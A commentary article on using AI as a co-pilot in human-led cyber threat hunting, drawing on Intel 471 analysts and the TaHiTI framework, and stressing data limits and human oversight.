AI is everywhere right now. It’s in your inbox, your social feeds and even your car. And in cybersecurity, it’s being pitched as the magic bullet that will finally let defenders keep up with attackers. I’ve covered enough hype cycles to know that’s never the whole story.
AI in threat hunting is no exception — it’s powerful, but it’s not a panacea.
Not long ago, many companies flat-out banned tools like ChatGPT out of fear of data leaks and productivity risks. Who am I kidding? Many companies are still doing that right now.
But, fast-forward a year and CISOs are experimenting with agentic AI to automate workflows and plug skills gaps. Meanwhile, attackers are busy too, using AI to polish phishing lures, generate deepfakes and even script parts of data extortion campaigns.
But there’s an important distinction: using AI for individual steps in an attack isn’t the same as AI running the whole operation. That vision — of AI-driven kill chains outpacing human defenders—is still more science fiction than fact. For now, the most interesting action is on the defender’s side, where AI is starting to take a practical role as a co-pilot in human-led hunts.
A Framework for Reality: TaHiTI
One of the most interesting aspects of AI’s emerging role is threat hunting. Intel 471 has released a report detailing how they’re employing TaHiTI — Targeted Hunting integrating Threat Intelligence – to streamline and automate threat hunting. Developed in the financial sector, it breaks hunting into three phases: Initiate, Hunt and Finalize. It’s vendor-neutral and forces structure on what can otherwise be chaotic work.
Scott Poley, a senior threat hunt analyst with Intel 471, points out that TaHiTI works precisely because it reflects the cyclical nature of hunts. You don’t just test a hypothesis once — you refine it, run it against your environment and iterate until you’ve mapped normal behavior from the truly malicious.
AI can speed that process but it can’t replace the institutional knowledge that separates theory from reality.
Sounding Board, Not Oracle
When you’re kicking off a hunt, AI can help stress-test a hypothesis or map tactics to MITRE ATT&CK. Poley told me that one of AI’s biggest strengths today is hypothesis development and expedited research. It can give junior analysts a boost by surfacing behaviors or techniques that senior analysts already recognize as relevant, bridging that skills gap.
At the same time, he warned about the tendency of large language models to be overly agreeable. To keep AI honest, he takes a step-by-step approach — laying out what he knows, then asking the model to validate or challenge it. That conversational style, he said, leads to better insights and avoids being misled.
Queries, Clusters and Context
Once you’re in the weeds, AI can template queries and point you to documentation faster than scrolling through search results. That’s a real time saver for junior analysts. But Poley also noted that AI often struggles with syntax or optimization. He has had to correct AI-generated queries himself and feed the right syntax back, only to get a casual “that makes sense” in return.
Where AI really shines is in enrichment. Threat hunts often risk tunnel vision — fixating on a single artifact or path. AI can help expand the perspective, linking activity to adjacent threat actor techniques or surfacing aliases in PowerShell that a hunter might overlook. Poley described this as the kind of context that turns a small win into a more complete hunt.
Data Is Destiny
Here’s the blunt truth: if your logs only go back 30 or 60 days, AI will just amplify the gaps. Lee Archinal, also a senior threat hunt analyst at Intel 471, explained that EDR data with short retention makes benign but rare behaviors — like opening Word once a month — look like anomalies. SIEMs with longer histories are more helpful but still need human tuning to distinguish real threats from statistical noise.
Archinal stressed that AI is best seen as a tool to make tasks easier, not as a replacement for human expertise. You still need an analyst who understands when to apply enrichment, what baselines matter in your environment and how to tell the difference between a quirk of user behavior and a true compromise.
Let AI Draft, Let Humans Decide
No one loves writing reports. AI is fantastic at pulling together structured summaries with executive takeaways and technical detail. Done right, that consistency reduces cognitive load for stakeholders and speeds handoffs to SOC, IR and vulnerability management teams.
This is where AI can make threat hunters more efficient without putting the organization at risk. Let the model draft, then let the human edit.
The Road Ahead
Looking forward, AI’s role in retrospective analysis and playbooks may prove most valuable. Running yesterday’s hunt against 90 days of logs to spot trends or test hypotheses is grunt work tailor-made for AI. Over time, that history can even train systems to suggest “next steps” based on what worked in similar cases.
But automation should reflect human decisions, not replace them. Poley gave me a vivid example: in an incident, disabling an account might stop an attacker — but it might also break a core business process if done at the wrong time. That’s a decision no AI should make without human oversight.
The lesson? AI is here to stay in threat hunting, but it belongs in the loop — not on the trigger. Use it to scale enrichment, clustering and reporting. Anchor it with frameworks like TaHiTI. And above all, treat it as a co-pilot, not an autopilot.
Attackers are experimenting with AI too, but defenders have an opportunity to use it more responsibly and effectively. The difference will come down to how well we understand the limits and how disciplined we are about keeping humans in charge.